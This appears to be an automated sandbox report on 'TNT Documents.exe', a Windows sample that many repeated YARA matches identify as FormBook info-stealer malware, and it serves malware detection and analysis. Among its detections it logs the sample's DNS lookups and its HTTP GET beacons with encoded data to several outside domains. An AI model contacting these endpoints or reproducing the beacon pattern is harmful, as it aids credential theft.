          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.comp
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/F
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/M
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/slnt
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/soft
          Source: TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265384324.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265335700.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comus4
          Source: TNT Documents.exe, 00000000.00000003.262108739.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262382693.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262663913.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262518900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262298913.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: TNT Documents.exe, 00000000.00000003.260239394.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comU
          Source: TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267332900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267369494.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264299140.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de2
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.der
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn9
          Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
          Source: unknownDNS traffic detected: queries for: www.cortepuroiberico.com
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1Host: www.cortepuroiberico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1Host: www.specialtyplastics.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.coached.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: TNT Documents.exe
          .NET source code contains very large stringsShow sources
          Source: TNT Documents.exe, Form1.csLong String: Length: 22528
          Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.csLong String: Length: 22528
          Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.csLong String: Length: 22528
          Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.csLong String: Length: 22528
          Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.csLong String: Length: 22528
          Source: TNT Documents.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
